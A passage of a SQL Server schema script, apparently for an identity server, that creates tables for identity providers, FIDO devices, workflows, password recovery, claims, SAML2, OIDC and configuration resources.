FOREIGN KEY (IDP_ID) REFERENCES IDP(ID) ON DELETE CASCADE
);
IF NOT EXISTS (SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[IDP_CLAIM_MAPPING]') AND TYPE IN (N'U'))
CREATE TABLE IDP_CLAIM_MAPPING (
ID INTEGER IDENTITY,
IDP_CLAIM_ID INTEGER,
TENANT_ID INTEGER,
LOCAL_CLAIM VARCHAR(253),
DEFAULT_VALUE VARCHAR(255),
IS_REQUESTED VARCHAR(128) DEFAULT '0',
PRIMARY KEY (ID),
UNIQUE (IDP_CLAIM_ID, TENANT_ID, LOCAL_CLAIM),
FOREIGN KEY (IDP_CLAIM_ID) REFERENCES IDP_CLAIM(ID) ON DELETE CASCADE
);
IF NOT EXISTS (SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[IDP_AUTHENTICATOR]') AND TYPE IN (N'U'))
CREATE TABLE IDP_AUTHENTICATOR (
ID INTEGER IDENTITY,
TENANT_ID INTEGER,
IDP_ID INTEGER,
NAME VARCHAR(255) NOT NULL,
IS_ENABLED CHAR (1) DEFAULT '1',
DISPLAY_NAME VARCHAR(255),
PRIMARY KEY (ID),
UNIQUE (TENANT_ID, IDP_ID, NAME),
FOREIGN KEY (IDP_ID) REFERENCES IDP(ID) ON DELETE CASCADE
);
IF NOT EXISTS (SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[IDP_METADATA]') AND TYPE IN (N'U'))
CREATE TABLE IDP_METADATA (
ID INTEGER IDENTITY,
IDP_ID INTEGER,
NAME VARCHAR(255) NOT NULL,
VALUE VARCHAR(255) NOT NULL,
DISPLAY_NAME VARCHAR(255),
TENANT_ID INTEGER DEFAULT -1,
PRIMARY KEY (ID),
CONSTRAINT IDP_METADATA_CONSTRAINT UNIQUE (IDP_ID, NAME),
FOREIGN KEY (IDP_ID) REFERENCES IDP(ID) ON DELETE CASCADE
);
IF NOT EXISTS (SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[IDP_AUTHENTICATOR_PROPERTY]') AND TYPE IN (N'U'))
CREATE TABLE IDP_AUTHENTICATOR_PROPERTY (
ID INTEGER IDENTITY,
TENANT_ID INTEGER,
AUTHENTICATOR_ID INTEGER,
PROPERTY_KEY VARCHAR(255) NOT NULL,
PROPERTY_VALUE VARCHAR(2047),
IS_SECRET CHAR (1) DEFAULT '0',
PRIMARY KEY (ID),
UNIQUE (TENANT_ID, AUTHENTICATOR_ID, PROPERTY_KEY),
FOREIGN KEY (AUTHENTICATOR_ID) REFERENCES IDP_AUTHENTICATOR(ID) ON DELETE CASCADE
);
IF NOT EXISTS (SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[IDP_PROVISIONING_CONFIG]') AND TYPE IN (N'U'))
CREATE TABLE IDP_PROVISIONING_CONFIG (
ID INTEGER IDENTITY,
TENANT_ID INTEGER,
IDP_ID INTEGER,
PROVISIONING_CONNECTOR_TYPE VARCHAR(255) NOT NULL,
IS_ENABLED CHAR (1) DEFAULT '0',
IS_BLOCKING CHAR (1) DEFAULT '0',
IS_RULES_ENABLED CHAR (1) DEFAULT '0',
PRIMARY KEY (ID),
UNIQUE (TENANT_ID, IDP_ID, PROVISIONING_CONNECTOR_TYPE),
FOREIGN KEY (IDP_ID) REFERENCES IDP(ID) ON DELETE CASCADE
);
IF NOT EXISTS (SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[IDP_PROV_CONFIG_PROPERTY]') AND TYPE IN (N'U'))
CREATE TABLE IDP_PROV_CONFIG_PROPERTY (
ID INTEGER IDENTITY,
TENANT_ID INTEGER,
PROVISIONING_CONFIG_ID INTEGER,
PROPERTY_KEY VARCHAR(255) NOT NULL,
PROPERTY_VALUE VARCHAR(2048),
PROPERTY_BLOB_VALUE VARBINARY(MAX),
PROPERTY_TYPE CHAR(32) NOT NULL,
IS_SECRET CHAR (1) DEFAULT '0',
PRIMARY KEY (ID),
UNIQUE (TENANT_ID, PROVISIONING_CONFIG_ID, PROPERTY_KEY),
FOREIGN KEY (PROVISIONING_CONFIG_ID) REFERENCES IDP_PROVISIONING_CONFIG(ID) ON DELETE CASCADE
);
IF NOT EXISTS (SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[IDP_PROVISIONING_ENTITY]') AND TYPE IN (N'U'))
CREATE TABLE IDP_PROVISIONING_ENTITY (
ID INTEGER IDENTITY,
PROVISIONING_CONFIG_ID INTEGER,
ENTITY_TYPE VARCHAR(255) NOT NULL,
ENTITY_LOCAL_USERSTORE VARCHAR(255) NOT NULL,
ENTITY_NAME VARCHAR(255) NOT NULL,
ENTITY_VALUE VARCHAR(255),
TENANT_ID INTEGER,
ENTITY_LOCAL_ID VARCHAR(255),
PRIMARY KEY (ID),
UNIQUE (ENTITY_TYPE, TENANT_ID, ENTITY_LOCAL_USERSTORE, ENTITY_NAME, PROVISIONING_CONFIG_ID),
UNIQUE (PROVISIONING_CONFIG_ID, ENTITY_TYPE, ENTITY_VALUE),
FOREIGN KEY (PROVISIONING_CONFIG_ID) REFERENCES IDP_PROVISIONING_CONFIG(ID) ON DELETE CASCADE
);
IF NOT EXISTS (SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[IDP_LOCAL_CLAIM]') AND TYPE IN (N'U'))
CREATE TABLE IDP_LOCAL_CLAIM (
ID INTEGER IDENTITY,
TENANT_ID INTEGER,
IDP_ID INTEGER,
CLAIM_URI VARCHAR(255) NOT NULL,
DEFAULT_VALUE VARCHAR(255),
IS_REQUESTED VARCHAR(128) DEFAULT '0',
PRIMARY KEY (ID),
UNIQUE (TENANT_ID, IDP_ID, CLAIM_URI),
FOREIGN KEY (IDP_ID) REFERENCES IDP(ID) ON DELETE CASCADE
);
IF NOT EXISTS (SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[IDN_ASSOCIATED_ID]') AND TYPE IN (N'U'))
CREATE TABLE IDN_ASSOCIATED_ID (
ID INTEGER IDENTITY,
IDP_USER_ID VARCHAR(255) NOT NULL,
TENANT_ID INTEGER DEFAULT -1234,
IDP_ID INTEGER NOT NULL,
DOMAIN_NAME VARCHAR(255) NOT NULL,
USER_NAME VARCHAR(255) NOT NULL,
ASSOCIATION_ID CHAR(36) NOT NULL,
PRIMARY KEY (ID),
UNIQUE(IDP_USER_ID, TENANT_ID, IDP_ID),
FOREIGN KEY (IDP_ID) REFERENCES IDP(ID) ON DELETE CASCADE
);
IF NOT EXISTS (SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[IDN_USER_ACCOUNT_ASSOCIATION]') AND TYPE IN (N'U'))
CREATE TABLE IDN_USER_ACCOUNT_ASSOCIATION (
ASSOCIATION_KEY VARCHAR(255) NOT NULL,
TENANT_ID INTEGER,
DOMAIN_NAME VARCHAR(255) NOT NULL,
USER_NAME VARCHAR(255) NOT NULL,
PRIMARY KEY (TENANT_ID, DOMAIN_NAME, USER_NAME)
);
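-- FIDO device store tables --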
IF NOT EXISTS (SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[FIDO_DEVICE_STORE]') AND TYPE IN (N'U'))
CREATE TABLE FIDO_DEVICE_STORE (
TENANT_ID INTEGER,
DOMAIN_NAME VARCHAR(255) NOT NULL,
USER_NAME VARCHAR(45) NOT NULL,
TIME_REGISTERED DATETIME,
KEY_HANDLE VARCHAR(200) NOT NULL,
DEVICE_DATA VARCHAR(2048) NOT NULL,
PRIMARY KEY (TENANT_ID, DOMAIN_NAME, USER_NAME, KEY_HANDLE)
);
IF NOT EXISTS (SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[FIDO2_DEVICE_STORE]') AND TYPE IN (N'U'))
CREATE TABLE FIDO2_DEVICE_STORE (
TENANT_ID INTEGER,
DOMAIN_NAME VARCHAR(255) NOT NULL,
USER_NAME VARCHAR(45) NOT NULL,
TIME_REGISTERED DATETIME,
USER_HANDLE VARCHAR(64) NOT NULL,
CREDENTIAL_ID VARCHAR(200) NOT NULL,
PUBLIC_KEY_COSE VARCHAR(1024) NOT NULL,
SIGNATURE_COUNT BIGINT,
USER_IDENTITY VARCHAR(512) NOT NULL,
DISPLAY_NAME VARCHAR(255),
IS_USERNAMELESS_SUPPORTED CHAR(1) DEFAULT '0',
PRIMARY KEY (CREDENTIAL_ID, USER_HANDLE)
);
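-- Workflow management (WF) tables --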
IF NOT EXISTS (SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[WF_REQUEST]') AND TYPE IN (N'U'))
CREATE TABLE WF_REQUEST (
UUID VARCHAR (45),
CREATED_BY VARCHAR (255),
TENANT_ID INTEGER DEFAULT -1,
OPERATION_TYPE VARCHAR (50),
CREATED_AT DATETIME,
UPDATED_AT DATETIME,
STATUS VARCHAR (30),
REQUEST VARBINARY(MAX),
PRIMARY KEY (UUID)
);
IF NOT EXISTS (SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[WF_BPS_PROFILE]') AND TYPE IN (N'U'))
CREATE TABLE WF_BPS_PROFILE (
PROFILE_NAME VARCHAR(45),
HOST_URL_MANAGER VARCHAR(255),
HOST_URL_WORKER VARCHAR(255),
USERNAME VARCHAR(45),
PASSWORD VARCHAR(1023),
CALLBACK_HOST VARCHAR (45),
TENANT_ID INTEGER DEFAULT -1,
PRIMARY KEY (PROFILE_NAME, TENANT_ID)
);
IF NOT EXISTS (SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[WF_WORKFLOW]') AND TYPE IN (N'U'))
CREATE TABLE WF_WORKFLOW(
ID VARCHAR (45),
WF_NAME VARCHAR (45),
DESCRIPTION VARCHAR (255),
TEMPLATE_ID VARCHAR (45),
IMPL_ID VARCHAR (45),
TENANT_ID INTEGER DEFAULT -1,
PRIMARY KEY (ID)
);
IF NOT EXISTS (SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[WF_WORKFLOW_ASSOCIATION]') AND TYPE IN (N'U'))
CREATE TABLE WF_WORKFLOW_ASSOCIATION(
ID INTEGER NOT NULL IDENTITY ,
ASSOC_NAME VARCHAR (45),
EVENT_ID VARCHAR(45),
ASSOC_CONDITION VARCHAR (2000),
WORKFLOW_ID VARCHAR (45),
IS_ENABLED CHAR (1) DEFAULT '1',
TENANT_ID INTEGER DEFAULT -1,
PRIMARY KEY(ID),
FOREIGN KEY (WORKFLOW_ID) REFERENCES WF_WORKFLOW(ID) ON DELETE CASCADE
);
IF NOT EXISTS (SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[WF_WORKFLOW_CONFIG_PARAM]') AND TYPE IN (N'U'))
CREATE TABLE WF_WORKFLOW_CONFIG_PARAM(
WORKFLOW_ID VARCHAR (45),
PARAM_NAME VARCHAR (45),
PARAM_VALUE VARCHAR (1000),
PARAM_QNAME VARCHAR (45),
PARAM_HOLDER VARCHAR (45),
TENANT_ID INTEGER DEFAULT -1,
PRIMARY KEY (WORKFLOW_ID, PARAM_NAME, PARAM_QNAME, PARAM_HOLDER),
FOREIGN KEY (WORKFLOW_ID) REFERENCES WF_WORKFLOW(ID) ON DELETE CASCADE
);
IF NOT EXISTS (SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[WF_REQUEST_ENTITY_RELATIONSHIP]') AND TYPE IN (N'U'))
CREATE TABLE WF_REQUEST_ENTITY_RELATIONSHIP(
REQUEST_ID VARCHAR (45),
ENTITY_NAME VARCHAR (255),
ENTITY_TYPE VARCHAR (50),
TENANT_ID INTEGER DEFAULT -1,
PRIMARY KEY(REQUEST_ID, ENTITY_NAME, ENTITY_TYPE, TENANT_ID),
FOREIGN KEY (REQUEST_ID) REFERENCES WF_REQUEST(UUID) ON DELETE CASCADE
);
IF NOT EXISTS (SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[WF_WORKFLOW_REQUEST_RELATION]') AND TYPE IN (N'U'))
CREATE TABLE WF_WORKFLOW_REQUEST_RELATION(
RELATIONSHIP_ID VARCHAR (45),
WORKFLOW_ID VARCHAR (45),
REQUEST_ID VARCHAR (45),
UPDATED_AT DATETIME,
STATUS VARCHAR (30),
TENANT_ID INTEGER DEFAULT -1,
PRIMARY KEY (RELATIONSHIP_ID),
FOREIGN KEY (WORKFLOW_ID) REFERENCES WF_WORKFLOW(ID) ON DELETE CASCADE,
FOREIGN KEY (REQUEST_ID) REFERENCES WF_REQUEST(UUID) ON DELETE CASCADE
);
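-- Identity recovery and password history tables --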
IF NOT EXISTS (SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[IDN_RECOVERY_DATA]') AND TYPE IN (N'U'))
CREATE TABLE IDN_RECOVERY_DATA (
USER_NAME VARCHAR(255) NOT NULL,
USER_DOMAIN VARCHAR(127) NOT NULL,
TENANT_ID INTEGER DEFAULT -1,
CODE VARCHAR(255) NOT NULL,
SCENARIO VARCHAR(255) NOT NULL,
STEP VARCHAR(127) NOT NULL,
TIME_CREATED DATETIME NOT NULL,
REMAINING_SETS VARCHAR(2500) DEFAULT NULL,
PRIMARY KEY(USER_NAME, USER_DOMAIN, TENANT_ID, SCENARIO,STEP),
UNIQUE(CODE)
);
IF NOT EXISTS (SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[IDN_PASSWORD_HISTORY_DATA]') AND TYPE IN (N'U'))
CREATE TABLE IDN_PASSWORD_HISTORY_DATA (
ID INTEGER NOT NULL IDENTITY ,
USER_NAME VARCHAR(255) NOT NULL,
USER_DOMAIN VARCHAR(127) NOT NULL,
TENANT_ID INTEGER DEFAULT -1,
SALT_VALUE VARCHAR(255),
HASH VARCHAR(255) NOT NULL,
TIME_CREATED DATETIME NOT NULL,
PRIMARY KEY (ID),
UNIQUE (USER_NAME,USER_DOMAIN,TENANT_ID,SALT_VALUE,HASH)
);
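-- Claim management tables --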
IF NOT EXISTS (SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[IDN_CLAIM_DIALECT]') AND TYPE IN (N'U'))
CREATE TABLE IDN_CLAIM_DIALECT (
ID INTEGER NOT NULL IDENTITY,
DIALECT_URI VARCHAR (255) NOT NULL,
TENANT_ID INTEGER NOT NULL,
PRIMARY KEY (ID),
CONSTRAINT DIALECT_URI_CONSTRAINT UNIQUE (DIALECT_URI, TENANT_ID)
);
IF NOT EXISTS (SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[IDN_CLAIM]') AND TYPE IN (N'U'))
CREATE TABLE IDN_CLAIM (
ID INTEGER NOT NULL IDENTITY,
DIALECT_ID INTEGER NOT NULL,
CLAIM_URI VARCHAR (255) NOT NULL,
TENANT_ID INTEGER NOT NULL,
PRIMARY KEY (ID),
FOREIGN KEY (DIALECT_ID) REFERENCES IDN_CLAIM_DIALECT(ID) ON DELETE CASCADE,
CONSTRAINT CLAIM_URI_CONSTRAINT UNIQUE (DIALECT_ID, CLAIM_URI, TENANT_ID)
);
IF NOT EXISTS (SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[IDN_CLAIM_MAPPED_ATTRIBUTE]') AND TYPE IN (N'U'))
CREATE TABLE IDN_CLAIM_MAPPED_ATTRIBUTE (
ID INTEGER NOT NULL IDENTITY,
LOCAL_CLAIM_ID INTEGER,
USER_STORE_DOMAIN_NAME VARCHAR (255) NOT NULL,
ATTRIBUTE_NAME VARCHAR (255) NOT NULL,
TENANT_ID INTEGER NOT NULL,
PRIMARY KEY (ID),
FOREIGN KEY (LOCAL_CLAIM_ID) REFERENCES IDN_CLAIM(ID) ON DELETE CASCADE,
CONSTRAINT USER_STORE_DOMAIN_CONSTRAINT UNIQUE (LOCAL_CLAIM_ID, USER_STORE_DOMAIN_NAME, TENANT_ID)
);
IF NOT EXISTS (SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[IDN_CLAIM_PROPERTY]') AND TYPE IN (N'U'))
CREATE TABLE IDN_CLAIM_PROPERTY (
ID INTEGER NOT NULL IDENTITY,
LOCAL_CLAIM_ID INTEGER,
PROPERTY_NAME VARCHAR (255) NOT NULL,
PROPERTY_VALUE VARCHAR (255) NOT NULL,
TENANT_ID INTEGER NOT NULL,
PRIMARY KEY (ID),
FOREIGN KEY (LOCAL_CLAIM_ID) REFERENCES IDN_CLAIM(ID) ON DELETE CASCADE,
CONSTRAINT PROPERTY_NAME_CONSTRAINT UNIQUE (LOCAL_CLAIM_ID, PROPERTY_NAME, TENANT_ID)
);
IF NOT EXISTS (SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[IDN_CLAIM_MAPPING]') AND TYPE IN (N'U'))
CREATE TABLE IDN_CLAIM_MAPPING (
ID INTEGER NOT NULL IDENTITY,
EXT_CLAIM_ID INTEGER NOT NULL,
MAPPED_LOCAL_CLAIM_ID INTEGER NOT NULL,
TENANT_ID INTEGER NOT NULL,
PRIMARY KEY (ID),
FOREIGN KEY (EXT_CLAIM_ID) REFERENCES IDN_CLAIM(ID) ON DELETE CASCADE ,
FOREIGN KEY (MAPPED_LOCAL_CLAIM_ID) REFERENCES IDN_CLAIM(ID) ON DELETE NO ACTION ,
CONSTRAINT EXT_TO_LOC_MAPPING_CONSTRN UNIQUE (EXT_CLAIM_ID, TENANT_ID)
);
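-- SAML2 assertion and artifact store tables --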
IF NOT EXISTS (SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[IDN_SAML2_ASSERTION_STORE]') AND TYPE IN (N'U'))
CREATE TABLE IDN_SAML2_ASSERTION_STORE (
ID INTEGER NOT NULL IDENTITY,
SAML2_ID VARCHAR(255) ,
SAML2_ISSUER VARCHAR(255) ,
SAML2_SUBJECT VARCHAR(255) ,
SAML2_SESSION_INDEX VARCHAR(255) ,
SAML2_AUTHN_CONTEXT_CLASS_REF VARCHAR(255) ,
SAML2_ASSERTION VARCHAR(4096) ,
ASSERTION VARBINARY(MAX) ,
PRIMARY KEY (ID)
);
IF NOT EXISTS (SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[IDN_SAML2_ARTIFACT_STORE]') AND TYPE IN (N'U'))
CREATE TABLE IDN_SAML2_ARTIFACT_STORE (
ID INTEGER NOT NULL IDENTITY,
SOURCE_ID VARCHAR(255) NOT NULL,
MESSAGE_HANDLER VARCHAR(255) NOT NULL,
AUTHN_REQ_DTO VARBINARY(MAX) NOT NULL,
SESSION_ID VARCHAR(255) NOT NULL,
INIT_TIMESTAMP DATETIME NOT NULL,
EXP_TIMESTAMP DATETIME NOT NULL,
ASSERTION_ID VARCHAR(255),
PRIMARY KEY (ID)
);
IF NOT EXISTS (SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[IDN_OIDC_JTI]') AND TYPE IN (N'U'))
CREATE TABLE IDN_OIDC_JTI (
JWT_ID VARCHAR(255) NOT NULL,
EXP_TIME DATETIME NOT NULL,
TIME_CREATED DATETIME NOT NULL,
PRIMARY KEY (JWT_ID)
);
IF NOT EXISTS (SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[IDN_OIDC_PROPERTY]') AND TYPE IN (N'U'))
CREATE TABLE IDN_OIDC_PROPERTY (
ID INTEGER NOT NULL IDENTITY,
TENANT_ID INTEGER ,
CONSUMER_KEY VARCHAR(255) ,
PROPERTY_KEY VARCHAR(255) NOT NULL ,
PROPERTY_VALUE VARCHAR(2047) ,
PRIMARY KEY (ID),
FOREIGN KEY (CONSUMER_KEY) REFERENCES IDN_OAUTH_CONSUMER_APPS(CONSUMER_KEY) ON DELETE CASCADE
);
IF NOT EXISTS (SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[IDN_OIDC_REQ_OBJECT_REFERENCE]') AND TYPE IN (N'U'))
CREATE TABLE IDN_OIDC_REQ_OBJECT_REFERENCE (
ID INTEGER NOT NULL IDENTITY,
CONSUMER_KEY_ID INTEGER ,
CODE_ID VARCHAR(255) ,
TOKEN_ID VARCHAR(255) ,
SESSION_DATA_KEY VARCHAR(255),
PRIMARY KEY (ID),
FOREIGN KEY (CONSUMER_KEY_ID) REFERENCES IDN_OAUTH_CONSUMER_APPS(ID) ON DELETE CASCADE ,
FOREIGN KEY (TOKEN_ID) REFERENCES IDN_OAUTH2_ACCESS_TOKEN(TOKEN_ID),
FOREIGN KEY (CODE_ID) REFERENCES IDN_OAUTH2_AUTHORIZATION_CODE(CODE_ID)
);
IF NOT EXISTS (SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[IDN_OIDC_REQ_OBJECT_CLAIMS]') AND TYPE IN (N'U'))
CREATE TABLE IDN_OIDC_REQ_OBJECT_CLAIMS (
ID INTEGER NOT NULL IDENTITY,
REQ_OBJECT_ID INTEGER,
CLAIM_ATTRIBUTE VARCHAR(255) ,
ESSENTIAL CHAR(1) NOT NULL DEFAULT '0' ,
VALUE VARCHAR(255) ,
IS_USERINFO CHAR(1) NOT NULL DEFAULT '0',
PRIMARY KEY (ID),
FOREIGN KEY (REQ_OBJECT_ID) REFERENCES IDN_OIDC_REQ_OBJECT_REFERENCE (ID) ON DELETE CASCADE
);
IF NOT EXISTS (SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[IDN_OIDC_REQ_OBJ_CLAIM_VALUES]') AND TYPE IN (N'U'))
CREATE TABLE IDN_OIDC_REQ_OBJ_CLAIM_VALUES (
ID INTEGER NOT NULL IDENTITY,
REQ_OBJECT_CLAIMS_ID INTEGER ,
CLAIM_VALUES VARCHAR(255) ,
PRIMARY KEY (ID),
FOREIGN KEY (REQ_OBJECT_CLAIMS_ID) REFERENCES IDN_OIDC_REQ_OBJECT_CLAIMS(ID) ON DELETE CASCADE
);
IF NOT EXISTS (SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[IDN_CERTIFICATE]') AND TYPE IN (N'U'))
CREATE TABLE IDN_CERTIFICATE (
ID INTEGER IDENTITY,
NAME VARCHAR(100),
CERTIFICATE_IN_PEM VARBINARY(MAX),
TENANT_ID INTEGER DEFAULT 0,
PRIMARY KEY(ID),
CONSTRAINT CERTIFICATE_UNIQUE_KEY UNIQUE (NAME, TENANT_ID)
);
IF NOT EXISTS (SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[IDN_OIDC_SCOPE_CLAIM_MAPPING]') AND TYPE IN (N'U'))
CREATE TABLE IDN_OIDC_SCOPE_CLAIM_MAPPING (
ID INTEGER IDENTITY,
SCOPE_ID INTEGER NOT NULL,
EXTERNAL_CLAIM_ID INTEGER NOT NULL,
PRIMARY KEY (ID),
FOREIGN KEY (SCOPE_ID) REFERENCES IDN_OAUTH2_SCOPE(SCOPE_ID) ON DELETE CASCADE,
FOREIGN KEY (EXTERNAL_CLAIM_ID) REFERENCES IDN_CLAIM(ID) ON DELETE CASCADE,
UNIQUE (SCOPE_ID, EXTERNAL_CLAIM_ID)
);
IF NOT EXISTS (SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[IDN_FUNCTION_LIBRARY]') AND TYPE IN (N'U'))
CREATE TABLE IDN_FUNCTION_LIBRARY (
NAME VARCHAR(255) NOT NULL,
DESCRIPTION VARCHAR(1023),
TYPE VARCHAR(255) NOT NULL,
TENANT_ID INTEGER NOT NULL,
DATA VARBINARY(MAX) NOT NULL,
PRIMARY KEY (TENANT_ID,NAME)
);
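-- OAuth2 CIBA tables --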
IF NOT EXISTS (SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[IDN_OAUTH2_CIBA_AUTH_CODE]') AND TYPE IN (N'U'))
CREATE TABLE IDN_OAUTH2_CIBA_AUTH_CODE (
AUTH_CODE_KEY CHAR (36),
AUTH_REQ_ID CHAR (36),
ISSUED_TIME DATETIME NOT NULL DEFAULT CURRENT_TIMESTAMP,
CONSUMER_KEY VARCHAR(255),
LAST_POLLED_TIME DATETIME NOT NULL,
POLLING_INTERVAL INTEGER,
EXPIRES_IN INTEGER,
AUTHENTICATED_USER_NAME VARCHAR(255),
USER_STORE_DOMAIN VARCHAR(100),
TENANT_ID INTEGER,
AUTH_REQ_STATUS VARCHAR (100) DEFAULT 'REQUESTED',
IDP_ID INTEGER,
UNIQUE(AUTH_REQ_ID),
PRIMARY KEY (AUTH_CODE_KEY),
FOREIGN KEY (CONSUMER_KEY) REFERENCES IDN_OAUTH_CONSUMER_APPS(CONSUMER_KEY) ON DELETE CASCADE
);
IF NOT EXISTS (SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[IDN_OAUTH2_CIBA_REQUEST_SCOPES]') AND TYPE IN (N'U'))
CREATE TABLE IDN_OAUTH2_CIBA_REQUEST_SCOPES (
AUTH_CODE_KEY CHAR (36),
SCOPE VARCHAR (255),
FOREIGN KEY (AUTH_CODE_KEY) REFERENCES IDN_OAUTH2_CIBA_AUTH_CODE(AUTH_CODE_KEY) ON DELETE CASCADE
);
IF NOT EXISTS (SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[IDN_FED_AUTH_SESSION_MAPPING]') AND TYPE IN (N'U'))
CREATE TABLE IDN_FED_AUTH_SESSION_MAPPING (
IDP_SESSION_ID VARCHAR(255) NOT NULL,
SESSION_ID VARCHAR(255) NOT NULL,
IDP_NAME VARCHAR(255) NOT NULL,
AUTHENTICATOR_ID VARCHAR(255),
PROTOCOL_TYPE VARCHAR(255),
TIME_CREATED DATETIME NOT NULL DEFAULT CURRENT_TIMESTAMP,
PRIMARY KEY (IDP_SESSION_ID)
);
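-- Configuration management tables --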
IF NOT EXISTS (SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[IDN_CONFIG_TYPE]')
AND TYPE IN (N'U'))
CREATE TABLE IDN_CONFIG_TYPE (
ID VARCHAR(255) NOT NULL,
NAME VARCHAR(255) NOT NULL,
DESCRIPTION VARCHAR(1023) NULL,
PRIMARY KEY (ID),
CONSTRAINT TYPE_NAME_CONSTRAINT UNIQUE (NAME)
);
INSERT INTO IDN_CONFIG_TYPE (ID, NAME, DESCRIPTION) VALUES
('9ab0ef95-13e9-4ed5-afaf-d29bed62f7bd', 'IDP_TEMPLATE', 'Template type to uniquely identify IDP templates'),
('3c4ac3d0-5903-4e3d-aaca-38df65b33bfd', 'APPLICATION_TEMPLATE', 'Template type to uniquely identify Application templates'),
('8ec6dbf1-218a-49bf-bc34-0d2db52d151c', 'CORS_CONFIGURATION', 'A resource type to keep the tenant CORS configurations');
IF NOT EXISTS (SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[IDN_CONFIG_RESOURCE]')
AND TYPE IN (N'U'))
CREATE TABLE IDN_CONFIG_RESOURCE (
ID VARCHAR(255) NOT NULL,
TENANT_ID INT NOT NULL,
NAME VARCHAR(255) NOT NULL,
CREATED_TIME DATETIME NOT NULL,
LAST_MODIFIED DATETIME NOT NULL,
HAS_FILE BIT DEFAULT 0 NOT NULL,
HAS_ATTRIBUTE BIT DEFAULT 0 NOT NULL,
TYPE_ID VARCHAR(255) NOT NULL,
UNIQUE (NAME, TENANT_ID, TYPE_ID),
PRIMARY KEY (ID)
);
ALTER TABLE IDN_CONFIG_RESOURCE ADD CONSTRAINT TYPE_ID_FOREIGN_CONSTRAINT FOREIGN KEY (TYPE_ID) REFERENCES
IDN_CONFIG_TYPE (ID) ON DELETE CASCADE ON UPDATE CASCADE;
IF NOT EXISTS (SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[IDN_CONFIG_ATTRIBUTE]')
AND TYPE IN (N'U'))
CREATE TABLE IDN_CONFIG_ATTRIBUTE (
ID VARCHAR(255) NOT NULL,
RESOURCE_ID VARCHAR(255) NOT NULL,
ATTR_KEY VARCHAR(255) NOT NULL,
ATTR_VALUE VARCHAR(1023) NULL,
PRIMARY KEY (ID),
UNIQUE (RESOURCE_ID, ATTR_KEY)
);
ALTER TABLE IDN_CONFIG_ATTRIBUTE ADD CONSTRAINT RESOURCE_ID_ATTRIBUTE_FOREIGN_CONSTRAINT FOREIGN KEY (RESOURCE_ID)
REFERENCES IDN_CONFIG_RESOURCE (ID) ON DELETE CASCADE ON UPDATE CASCADE;
IF NOT EXISTS (SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[IDN_CONFIG_FILE]')
AND TYPE IN (N'U'))
CREATE TABLE IDN_CONFIG_FILE (
ID VARCHAR(255) NOT NULL,
VALUE VARBINARY(MAX) NULL,
NAME VARCHAR(255) NULL,
RESOURCE_ID VARCHAR(255) NOT NULL,
PRIMARY KEY (ID)
);
ALTER TABLE IDN_CONFIG_FILE ADD CONSTRAINT RESOURCE_ID_FILE_FOREIGN_CONSTRAINT FOREIGN KEY (RESOURCE_ID) REFERENCES
